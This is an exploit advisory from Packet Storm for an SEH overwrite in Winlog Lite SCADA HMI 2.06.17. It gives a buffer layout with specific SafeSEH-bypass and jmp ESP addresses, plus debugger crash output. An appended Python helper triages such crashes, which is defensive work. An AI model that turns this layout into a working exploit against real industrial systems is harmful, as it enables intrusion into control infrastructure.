Winlog Lite SCADA HMI System 2.06.17 SEH Overwrite
Posted Aug 29, 2012
Authored by Ciph3r

Winlog Lite SCADA HMI system version 2.06.17 suffers from a SEH overwrite vulnerability.

tags | exploit
MD5 | 0835ef58aed4416b07d9dcc746c517af

######################################################################################
# Vuln Title: Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability
#
# Author: FaryadR (a.k.a Ciph3r)
# tested on : winXp sp3 and Winlog Lite 2.06.17 Version
# Twitter : https://twitter.com/faryadR
# Mail : Ciph3r.secure@gmail.com
# Website : http://0c0c0c0c.com
# Vendor : http://www.sielcosistemi.com
#
#
######################################################################################

[+] Application Description:

Winlog Lite is the entry-level version of the Winlog Pro SCADA/HMI software
offered by Sielco Sistemi, intended to allow an evaluation of the capabilities
and ease of use of the package; Winlog Lite is also a powerful, low-cost
solution for building small supervisory applications.

Winlog Lite provides most of the development tools and functions of the
Winlog Pro software package, but limits the applications that can be developed
and run to a maximum of 24 tags. Winlog Lite does not include the Symbol
Factory library or web support.

Winlog Lite can run both in Demo mode (no registration required) and in Full
mode; in Demo mode, communication with external devices and sampling of
external tags stops automatically after 15 minutes (it can be restarted
manually if required); in Full mode, communication continues without any time limit.

[+] Proof of Concept:

After running Winlog Lite SCADA HMI System, go to the Tools menu and open Application Builder.
There we can inject our data into the Application Name field and select the Build button,
with the program attached to a debugger. The buffer layout is:

9986 bytes of 'A' + pointer to next SEH record (6-byte jmp) +
SE handler --> non-SafeSEH address to bypass SafeSEH protection (0x32450A7B) + NOP + jmp ESP (0x7C86467B) + shellcode




00385319 90 NOP
0038531A 90 NOP
0038531B 90 NOP
0038531C 55 PUSH EBP
0038531D 8BEC MOV EBP,ESP
0038531F 53 PUSH EBX
00385320 8B00 MOV EAX,DWORD PTR DS:[EAX]
00385322 8B12 MOV EDX,DWORD PTR DS:[EDX]
00385324 E8 AD020000 CALL <JMP.&Vcl40.@System@@LStrCmp$qqrv>
00385329 0F94C0 SETE AL
0038532C 83E0 01 AND EAX,1
0038532F 5B POP EBX
00385330 5D POP EBP
00385331 C3 RETN
00385332 90 NOP
00385333 90 NOP
00385334 55 PUSH EBP
00385335 8BEC MOV EBP,ESP
00385337 53 PUSH EBX
00385338 8B00 MOV EAX,DWORD PTR DS:[EAX] --------> Crashed!
0038533A 8B12 MOV EDX,DWORD PTR DS:[EDX]
0038533C E8 95020000 CALL <JMP.&Vcl40.@System@@LStrCmp$qqrv>
00385341 0F95C0 SETNE AL
00385344 83E0 01 AND EAX,1
00385347 5B POP EBX
00385348 5D POP EBP
00385349 C3 RETN
0038534A 90 NOP
0038534B 90 NOP
0038534C 55 PUSH EBP
0038534D 8BEC MOV EBP,ESP
0038534F 83C4 CC ADD ESP,-34
00385352 53 PUSH EBX
00385353 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
00385356 8955 D0 MOV DWORD PTR SS:[EBP-30],EDX
00385359 8BD8 MOV EBX,EAX
0038535B B8 007B3800 MOV EAX,DbfIntf.00387B00
00385360 E8 C3FDFFFF CALL DbfIntf.00385128


[+] Attributes: thunk

; __fastcall Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *)
@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent proc near
jmp ds:__imp_@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent ; Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *)
@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent endp



(1cec.1e7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000000 ecx=00000000 edx=0012cae4 esi=0012cb74 edi=41414141
eip=00385338 esp=0012ca94 ebp=0012ca98 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll -
DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c:
00385338 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????

0:000> u
DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c:
00385338 8b00 mov eax,dword ptr [eax]
0038533a 8b12 mov edx,dword ptr [edx]
0038533c e895020000 call DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0xb0a (003855d6)
00385341 0f95c0 setne al
00385344 83e001 and eax,1
00385347 5b pop ebx
00385348 5d pop ebp
00385349 c3 ret

0:000> !exchain
0012caac: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012cb24: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012f2ec: <Unloaded_s.dll>+43434342 (43434343)
Invalid exception stack at 42424242


0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ca98 003816dd 41414141 0012cba0 00000000 DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c
0012caf4 0038219f 0012cb70 41414141 0012cb74 DbfIntf+0x16dd
*** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\ABuilder.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\ABuilder.exe -
0012cb80 00404098 41414141 00000001 0012cba0 DbfIntf!DbiCreateTable+0xf3
0012f314 41414141 41414141 41414141 41414141 ABuilder!FormsTForm$bdtr$qqrv+0x15f4
0012f318 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f31c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f320 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f324 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f328 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f32c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f330 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f334 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f338 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f33c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f340 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f344 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f348 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f34c 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f350 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140
0012f354 41414141 41414141 41414141 41414141 <Unloaded_s.dll>+0x41414140



[+] 0verwrite SEH Pointer :


0012F2D4 41414141 AAAA
0012F2D8 41414141 AAAA
0012F2DC 41414141 AAAA
0012F2E0 41414141 AAAA
0012F2E4 41414141 AAAA
0012F2E8 41414141 AAAA
0012F2EC 42424242 BBBB Pointer to next SEH record
0012F2F0 43434343 CCCC SE handler
0012F2F4 41414141 AAAA
0012F2F8 41414141 AAAA
0012F2FC 41414141 AAAA
0012F300 41414141 AAAA
0012F304 41414141 AAAA
0012F308 41414141 AAAA
0012F30C 41414141 AAAA
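Added example, not part of the advisory: a small Python triage helper that parses a WinDbg register line and an !exchain listing of the kind shown above and flags fill patterns (41414141, 43434343) in registers and SEH pointers, which is how a fuzzing or incident-response queue would classify this crash as an SEH overwrite before anyone opens the debugger. The sample input is constructed from the values quoted in the advisory; the function names are my own.

```python
import re
# Constructed sample in the shape of the WinDbg output quoted in the advisory:
# the register line and the !exchain listing after the Application Builder crash.
SAMPLE_REGS = "eax=41414141 ebx=00000000 ecx=00000000 edx=0012cae4 esi=0012cb74 edi=41414141"
SAMPLE_EXCHAIN = """0012caac: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012cb24: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012f2ec: <Unloaded_s.dll>+43434342 (43434343)
Invalid exception stack at 42424242"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-fA-F]{8})")
CHAIN_RE = re.compile(r"^([0-9a-fA-F]{8}): (.*) \(([0-9a-fA-F]{8})\)\s*$")
INVALID_RE = re.compile(r"Invalid exception stack at ([0-9a-fA-F]{8})")

def is_fill_pattern(value):
    """A 32-bit hex value made of one printable byte repeated (41414141, 43434343):
    the signature of a fill buffer landing in a register or an SEH pointer."""
    b = bytes.fromhex(value)
    return len(set(b)) == 1 and 0x20 <= b[0] < 0x7F

def tainted_registers(reg_line):
    """Names of registers whose content is a fill pattern, e.g. ['eax', 'edi']."""
    return sorted(name for name, val in REG_RE.findall(reg_line) if is_fill_pattern(val))

def corrupted_seh_records(exchain_text):
    """SEH records whose handler is not backed by a loaded module or is a fill
    pattern, plus a 'next' pointer that WinDbg reports as an invalid chain."""
    bad = []
    for line in exchain_text.splitlines():
        m = CHAIN_RE.match(line)
        if m:
            record, symbol, handler = m.groups()
            if symbol.startswith("<Unloaded_") or is_fill_pattern(handler):
                bad.append({"record": record, "handler": handler, "symbol": symbol})
            continue
        m = INVALID_RE.search(line)
        if m:
            bad.append({"record": None, "next": m.group(1), "symbol": "invalid next pointer"})
    return bad

def triage(reg_line, exchain_text):
    """Combine both signals into a verdict for a fuzzing or incident-response queue."""
    regs, seh = tainted_registers(reg_line), corrupted_seh_records(exchain_text)
    if seh:
        verdict = "SEH chain overwritten with controlled data: exploitable"
    elif regs:
        verdict = "controlled registers, SEH chain intact: probably exploitable"
    else:
        verdict = "no controlled data observed: manual review"
    return {"tainted_registers": regs, "bad_seh_records": seh, "verdict": verdict}
```

On the advisory's own dump the helper reports eax and edi as controlled and two bad SEH entries (the 43434343 handler with no backing module and the 42424242 next pointer), so the crash is queued as exploitable without manual inspection.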

© 2019 Packet Storm. All rights reserved.